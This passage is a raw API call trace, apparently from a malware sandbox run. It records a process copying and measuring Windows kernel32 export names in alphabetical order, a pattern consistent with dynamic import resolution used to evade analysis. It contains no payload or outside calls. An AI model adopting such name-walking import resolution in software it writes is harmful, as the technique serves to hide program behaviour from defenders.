lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.538] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.538] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.538] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.538] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.538] lstrlenA (lpString="ADDATOMA") returned 8 [0085.538] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.539] lstrlenA (lpString="ADDATOMW") returned 8 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.539] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.539] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.539] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.539] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.539] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.539] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.539] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.539] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.539] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.539] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.539] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.539] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.539] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.539] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.539] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.539] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.539] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.539] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.540] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.540] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.540] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.540] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.540] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.540] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.540] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.540] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.540] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.540] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.540] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.540] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.540] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.540] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.540] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.540] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.540] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.540] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.540] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.541] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.541] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.541] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.541] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.541] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.541] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.541] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.541] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.541] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.541] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.541] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.541] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.541] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.541] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.541] lstrlenA (lpString="BEEP") returned 4 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.541] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.541] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.541] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.541] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.542] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.542] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.542] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.542] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.542] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.542] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.542] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.542] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.542] lstrlenA (lpString="CANCELIO") returned 8 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.542] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.542] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.542] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.542] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.542] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.542] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.542] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.542] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.542] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.542] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.543] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.543] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.543] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.543] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.543] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.543] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.543] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.543] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.543] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.543] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.543] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.543] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.543] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.543] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.543] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.543] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.543] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.543] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.543] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.543] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.544] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.544] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.544] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.544] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.544] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.544] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.544] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.544] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.544] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.544] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.544] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.544] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.544] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.544] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.544] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.544] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.544] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.544] lstrlenA (lpString="COPYFILEA") returned 9 [0085.544] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.545] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.545] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.545] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.545] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.545] lstrlenA (lpString="COPYFILEW") returned 9 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.545] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.545] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.545] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.545] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.545] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.545] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.545] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.545] lstrcpyA (in: 